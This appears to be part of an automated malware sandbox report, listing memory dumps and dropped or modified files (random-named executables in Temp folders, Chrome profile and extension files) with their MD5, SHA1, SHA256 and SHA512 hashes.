memory/2452-852-0x00000000004E0000-0x000000000099C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10016760101\files.exe

MD5 434f706017b7f673ed5586f1470d7d28
SHA1 f431be69eab7bec0c1752f54977e32fd60278617
SHA256 a6b647b49538fe599002c116ee5cd79c7e2d472cb48b24b1dfcf9a2718088c2a
SHA512 d019cb403225f85f5344fb94da6257b216baa5b66000821a0357b03db9da555e51a6cfad576570bfc62f0db8077d92af9793843d48b0e1045ede79e14c4222d7

C:\ProgramData\bi5pp\zcbasrq90

MD5 a182561a527f929489bf4b8f74f65cd7
SHA1 8cd6866594759711ea1836e86a5b7ca64ee8911f
SHA256 42aad7886965428a941508b776a666a4450eb658cb90e80fae1e7457fc71f914
SHA512 9bc3bf5a82f6f057e873adebd5b7a4c64adef966537ab9c565fe7c4bb3582e2e485ff993d5ab8a6002363231958fabd0933b48811371b8c155eaa74592b66558

C:\Users\Admin\AppData\Local\Temp\10016830101\0c8f5528a7.exe

MD5 03e19c0d1438863db3987eaa0b5e64d1
SHA1 d0918d24bd2ec2c00ddf061c0959060475e3ea6a
SHA256 62577f16bab122613b5f4c89c3db52b4ee9698300b96417462ef19499cdf27a8
SHA512 47f45259bd75acd7c90c07fd98dc527810b27f9aa0283799029d7a1bde0d2bbbb8b3e61b579acb472bc4217c3f168b664d7c3f87265b213f156a34a416902b70

memory/5240-969-0x00000000006D0000-0x0000000001317000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

MD5 d751713988987e9331980363e24189ce
SHA1 97d170e1550eee4afc0af065b78cda302a97674c
SHA256 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512 b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

C:\Users\Admin\AppData\Local\Temp\10098490101\JCFx2xj.exe

MD5 7ff72f21d83d3abdc706781fb3224111
SHA1 3bfbe059b8e491bde4919fb29afa84d4ea1c0fa8
SHA256 0c54843666a464f185c97a7693a91eb328827a900717e414357b897bd2630fea
SHA512 dbb3c7b618bc2c80dae90ff902100d3902ddffe5705cf0c648b8b3f702fd8814b9cf66490e3260e09d36c1ce57bfc05d3f9bb0fc089c5ec7c553eb8a94d3320d

C:\Users\Admin\AppData\Local\Temp\scoped_dir5468_2036446822\13cb42d8-599a-4f46-8481-2038284758d1.tmp

MD5 eae462c55eba847a1a8b58e58976b253
SHA1 4d7c9d59d6ae64eb852bd60b48c161125c820673
SHA256 ebcda644bcfbd0c9300227bafde696e8923ddb004b4ee619d7873e8a12eae2ad
SHA512 494481a98ab6c83b16b4e8d287d85ba66499501545da45458acc395da89955971cf2a14e83c2da041c79c580714b92b9409aa14017a16d0b80a7ff3d91bad2a3

C:\Users\Admin\AppData\Local\Temp\scoped_dir5468_2036446822\CRX_INSTALL\_locales\en_CA\messages.json

MD5 558659936250e03cc14b60ebf648aa09
SHA1 32f1ce0361bbfdff11e2ffd53d3ae88a8b81a825
SHA256 2445cad863be47bb1c15b57a4960b7b0d01864e63cdfde6395f3b2689dc1444b
SHA512 1632f5a3cd71887774bf3cb8a4d8b787ea6278271657b0f1d113dbe1a7fd42c4daa717cc449f157ce8972037572b882dc946a7dc2c0e549d71982dcdee89f727

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.89.1_0\dasherSettingSchema.json

MD5 4ec1df2da46182103d2ffc3b92d20ca5
SHA1 fb9d1ba3710cf31a87165317c6edc110e98994ce
SHA256 6c69ce0fe6fab14f1990a320d704fee362c175c00eb6c9224aa6f41108918ca6
SHA512 939d81e6a82b10ff73a35c931052d8d53d42d915e526665079eeb4820df4d70f1c6aebab70b59519a0014a48514833fefd687d5a3ed1b06482223a168292105d

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.89.1_0\_locales\en_CA\messages.json

MD5 07ffbe5f24ca348723ff8c6c488abfb8
SHA1 6dc2851e39b2ee38f88cf5c35a90171dbea5b690
SHA256 6895648577286002f1dc9c3366f558484eb7020d52bbf64a296406e61d09599c
SHA512 7ed2c8db851a84f614d5daf1d5fe633bd70301fd7ff8a6723430f05f642ceb3b1ad0a40de65b224661c782ffcec69d996ebe3e5bb6b2f478181e9a07d8cd41f6

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

MD5 6ff7a45c2833c230cd13198531f28f34
SHA1 6933179b048c91376f68fe16e4d696861f019ea7
SHA256 6f9979dcdea86619f091d6dd390142da54a7910629e467051d7e336f40fa8ac5
SHA512 e90a9e6bb58aeb2cb26d61b134ecc91eb7af3828e4317cd41ace1a75af336f92fbce9ad2515f7d2efc9e8144d58018bd13fac1113366afb86a6d464a45498883